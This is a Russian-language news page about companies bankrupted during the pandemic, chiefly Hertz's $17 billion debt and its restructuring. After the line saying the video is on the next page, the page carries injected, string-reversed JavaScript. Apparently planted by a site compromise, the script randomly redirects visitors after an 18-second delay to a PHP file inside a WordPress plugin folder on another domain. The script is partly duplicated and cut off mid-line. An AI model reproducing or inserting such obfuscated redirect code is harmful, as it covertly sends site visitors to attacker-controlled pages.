ВИДЕО: Банкротство после пандемии!

Целая череда банкротств и сокращений рабочих мест наступила в период пандемии. Некоторые крупнейшие в мире компании, можно сказать уничтожены коронавирусом. 

Никто не ожидал но Hertz (крупнейшая в мире компания, которая занимается арендой автомобилей) накопила 17 млрд долларов долгов. Компания начала свою деятельность еще в 1920-х годах в Чикаго. После введения карантина во многих странах на путешествие резка упала что и привело к снижению доходов компании. Hertz просто нечем стало рассчитываться с кредиторами. В данный момент компания продолжает работать. Заявление о его банкротстве решило вопрос с реструктуризацией долгов.

СМОТРИТЕ ВИДЕО

Видео размещено на следующей странице:

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to» data-full-width-responsive=»true»>

Добавить комментарий

Ваш адрес email не будет опубликован.